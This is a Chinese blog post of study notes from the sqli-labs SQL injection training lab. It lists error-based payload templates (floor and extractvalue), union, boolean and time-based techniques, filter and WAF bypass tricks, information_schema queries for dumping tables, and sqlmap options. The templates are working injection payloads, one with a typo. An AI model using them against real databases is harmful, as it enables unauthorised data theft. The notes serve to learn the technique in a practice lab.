DAY7 sqli-labs阶段总结
基本步骤
- 判断是否报错
- 判断闭合符号
- 判断注入类型
- 构建payload
- 手工注入或者编写脚本
基本注入类型
- 报错型注入
- floor公式(结果多出一个1):
and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a) - extractvalue公式(首尾各有一个波浪号):
and extracvalue(1,concat(0x7e,(payload),0x7e)
- 布尔型注入
- 联合查询语句
- 回显点查询:UNION SELECT 1,2,3;
- 延时注入
其他注入技巧
- HPP绕过WAF
- 宽字节注入绕过引号过滤
- CHAR函数绕过引号过滤
- ||与&&绕过and和or的过滤
- 分割字符绕过一次字符串过滤
- 二次注入
- Linux特殊字符绕过空格过滤
- 括号法绕过空格过滤
常用SQL语句与函数
- 取子字符串:
mid(string, start, length) - 取子字符串:
left(string, length) - 取ASCII:
ascii(char) - 查询当前数据库:
database() - 查询当前用户:
user() - 当前数据库版本:
@@version - 数据库文件路径:
@@datadir - 爆表:
select table_name from information_schema.tables where table_schema='database' - 爆库:
select column_name from information_schema.columns where table_schem='database' and table_name='table' - 字符串连接:
concat() - 字符串按组输出:
group_concat() - 按照分隔符连接:
concat_ws(char,...) - 字段数猜解:
ORDER BY x
sqlmap使用基础
- -u指定url
- -p指定参数
- -D指定数据库
- -T指定表
- -C指定字段
- –current-db当前数据库
- –current-user当前用户
- –dbs查询所有数据库
- –tables查询所有表
- –columns查询所有字段名
- –dump查询记录
- –techniques X(X=B布尔型,E报错型,U联合注入型,T延迟型):指定注入类型
注意点
- 一些特殊符号需要编码,如&
- +在GET参数中会变成空格
posted on
2019-03-01 07:32
Tiumo 阅读(
...) 评论(
)
编辑
收藏
posted @
2019-03-01 07:32
杨谖之
阅读(
10)
评论()
收藏
举报
来源
浙公网安备 33010602011771号